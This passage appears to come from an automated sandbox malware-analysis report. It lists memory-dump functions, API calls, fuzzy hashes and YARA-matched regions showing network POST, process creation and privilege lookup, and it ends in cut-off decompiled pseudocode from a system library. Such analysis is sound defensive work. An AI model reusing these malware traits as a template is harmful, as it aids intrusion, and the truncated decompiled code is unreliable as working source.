                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                              • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                              • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                              • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                              • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                              • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                              • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 01EBFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.665945266.0000000001EB0000.00000040.00000001.sdmp, Offset: 01EA0000, based on PE: true
                                                              • Associated: 00000006.00000002.665938551.0000000001EA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666041714.0000000001F90000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666052467.0000000001FA0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666063534.0000000001FA4000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666081748.0000000001FA7000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666114112.0000000001FB0000.00000040.00000001.sdmp Download File
                                                              • Associated: 00000006.00000002.666168843.0000000002010000.00000040.00000001.sdmp Download File
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                              • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                              • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000D9076, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000D9128
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: POST$net.dll$wininet.dll
                                                              • API String ID: 3472027048-3140911592
                                                              • Opcode ID: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                                                              • Instruction ID: 5bc012dca19314cd43af20c2bdc7f3c6f60dfaade626dbbdae33bbca710f8ae5
                                                              • Opcode Fuzzy Hash: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                                                              • Instruction Fuzzy Hash: A631F076600305BBD714EF64C885BABB7B8EB48704F10811AFA2D5B342D770A910CBB5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000D9080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • Sleep.KERNELBASE(000007D0), ref: 000D9128
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID: net.dll$wininet.dll
                                                              • API String ID: 3472027048-1269752229
                                                              • Opcode ID: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                                                              • Instruction ID: cc8e5cc3e778219830e10a4cb02142128005a96681e1272de73a57475b6eefeb
                                                              • Opcode Fuzzy Hash: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                                                              • Instruction Fuzzy Hash: F93161B6500745BBC724DF64C889FABB7F9BB48B00F10851EF62A5B245D630B550CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA5F6, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6E,?,000D4CAF,000D4CAF,?,000D4536,?,?,?,?,?,00000000,00000000,?), ref: 000DA65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6E
                                                              • API String ID: 1279760036-739805133
                                                              • Opcode ID: 7194f638ea6bd9414c0e0694083c68c6932af03ab105997f5b8ef94423553d32
                                                              • Instruction ID: b7a80629289d8bac7e0ab539911324c5d8e3cc2ffc851d1c67c2dee9250859b8
                                                              • Opcode Fuzzy Hash: 7194f638ea6bd9414c0e0694083c68c6932af03ab105997f5b8ef94423553d32
                                                              • Instruction Fuzzy Hash: 7311AFB1200204AFDB14DF98DC85EEB77A8EF85760F188599F95C9B242C531E910CBB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA775, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA734
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID: .P
                                                              • API String ID: 2186235152-3002838398
                                                              • Opcode ID: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                                                              • Instruction ID: a4def35fcb088ff9eedce9a870ba19f09f2991c6f8193e1ffc9b7d53853b3859
                                                              • Opcode Fuzzy Hash: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                                                              • Instruction Fuzzy Hash: 72118EB52042486FDB14DF98DC81DE777ACEF89714F14829AF94C8B246C534E815CBB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(6E,?,000D4CAF,000D4CAF,?,000D4536,?,?,?,?,?,00000000,00000000,?), ref: 000DA65D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID: 6E
                                                              • API String ID: 1279760036-739805133
                                                              • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction ID: d27633df122d7444cd45e69388904aacdcaa4e9d85a840e095ffae3908121d9b
                                                              • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                              • Instruction Fuzzy Hash: 26E012B1200208ABDB14EF99CC41EA777ACEF88654F158599BA085B242C630F9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000C3AF8), ref: 000DA69D
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID: .z`
                                                              • API String ID: 3298025750-1441809116
                                                              • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction ID: 833fd6bac7bb3bc6fc8ba597ab9392afa5a9cc8ef4b2abd463215f905d665dc8
                                                              • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                              • Instruction Fuzzy Hash: 3BE012B1200208ABDB18EF99CC49EA777ACEF88750F118599BA085B242C630E9108AB0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000C8308, Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                                                              • Instruction ID: 6e9f33d53c74b92d3944fa946699dd0c0dec5c700d3084c94fb570068a0b4432
                                                              • Opcode Fuzzy Hash: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                                                              • Instruction Fuzzy Hash: EA01D631A4022877E725A7949C42FFE77686B41B95F04414DFF04BB2C2E6A4690647F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000C8310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000C836A
                                                              • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000C838B
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID:
                                                              • API String ID: 1836367815-0
                                                              • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                              • Instruction ID: 0cf38f52aac7cb1b50b042b91411d8ec99d7be691cc7da678c93a7e49adf1d6d
                                                              • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                                                              • Instruction Fuzzy Hash: 5F018F31A8032C7BE721A6949C43FFE776C6B41F55F054119FF04BA2C2EAA46A0647F6
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000CACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000CAD62
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction ID: 835aae2cdd972bd841f2f745de3f979b3e6f12249c33657fe5215b0e69298a89
                                                              • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                                                              • Instruction Fuzzy Hash: 84011EB5E4020DBBDF10DBA4DC42FDDB7B89B54308F00459AEA0997642F631EB14CBA2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000CF6C7, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6FB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                                                              • Instruction ID: 8939d49f9e8f792931d76e75e04eaae435b6e5168e75acc53c1c5d500b456ce0
                                                              • Opcode Fuzzy Hash: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                                                              • Instruction Fuzzy Hash: 1701AC7194020D7AEB20EBA4DC86FFE73A9EF54B10F054599F90CA7283D7B0998187A5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA734
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction ID: 4c29f43dadfff1bab8b637be6b824bc3a637cbab9eae0dca9c008fa58d9db889
                                                              • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                              • Instruction Fuzzy Hash: 9101AFB2210208ABCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA6E2, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000DA734
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateInternalProcess
                                                              • String ID:
                                                              • API String ID: 2186235152-0
                                                              • Opcode ID: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                                                              • Instruction ID: 316aa8f4d3aa580bb2193673294da48da13bb43ffc185f85d09decb27f156055
                                                              • Opcode Fuzzy Hash: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                                                              • Instruction Fuzzy Hash: E4015BB2210108AFCB58DF99DC80EEB77A9AF8C754F158258BA0DE7255D630E851CBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000D91B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000CF050,?,?,00000000), ref: 000D91EC
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: CreateThread
                                                              • String ID:
                                                              • API String ID: 2422867632-0
                                                              • Opcode ID: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                                                              • Instruction ID: e86311bccc33afaaf0d6913dbe43ef6e4dc7957d2c28d90f2584a79dacc2473a
                                                              • Opcode Fuzzy Hash: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                                                              • Instruction Fuzzy Hash: 8DE092373903043AE3306599AC03FE7B39CDB81B20F140026FA0DEB2C2D995F80142B4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA7C4, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1D2,000CF1D2,?,00000000,?,?), ref: 000DA800
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                                                              • Instruction ID: 1711603454b9a93f6dde03e4f0b787df3c31ced6ee6930a2b495de40cfacb7b6
                                                              • Opcode Fuzzy Hash: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                                                              • Instruction Fuzzy Hash: 4CF058B63102086BDB10EF99DC81EEB73A9EF89720F10855AFE0C97241C635E9008BB1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000DA7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,000CF1D2,000CF1D2,?,00000000,?,?), ref: 000DA800
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: LookupPrivilegeValue
                                                              • String ID:
                                                              • API String ID: 3899507212-0
                                                              • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction ID: d65f15b27cf3e37c2656930f4eeb94e8ab50f37be8f5b5a6d575ba66f6579d45
                                                              • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                              • Instruction Fuzzy Hash: 49E01AB12002086BDB10DF89CC85EE737ADEF89650F118165BA0857242C930E8108BF5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 000CF6D0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SetErrorMode.KERNELBASE(00008003,?,000C8D14,?), ref: 000CF6FB
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.664254496.00000000000C0000.00000040.00020000.sdmp, Offset: 000C0000, based on PE: false
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ErrorMode
                                                              • String ID:
                                                              • API String ID: 2340568224-0
                                                              • Opcode ID: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                              • Instruction ID: 482f86f86401dfeb975a57f8f1f614de5735923d4d6a7f8b2160aab3d263f72f
                                                              • Opcode Fuzzy Hash: 2932bcf02bc07d7163de81b169680dc5c005ffd35bbbe1c0c8f45c66faab01c4
                                                              • Instruction Fuzzy Hash: 4ED05E616503093BE610AAA49C03F6632C96B44B04F490064F948963C3D960E4004165
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Non-executed Functions

                                                              Function 01EE8788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                              Download Yara Rule
                                                              C-Code - Quality: 94%
                                                              			E01EE8788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E01EE8460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E01ECE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E01EE718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E01EE8460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E01EE718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E01EE8460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E01EE8460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E01EE8460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E01EE718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E01ECE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E01EC2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E01EDE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E01ECE2A8(_t322,  &_v68, _v16);
								if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E01EDE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E01ECE2A8(_t322,  &_v68, _t236);
								if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E01EE718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E01ECE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E01EC2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E01EDE679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E01ECE2A8(_v12,  &_v68, _v16);
							if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E01EDE679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E01ECE2A8(_t322,  &_v68, _t269);
							if(E01EE5553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E01ECE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E01EE718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E01ECE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
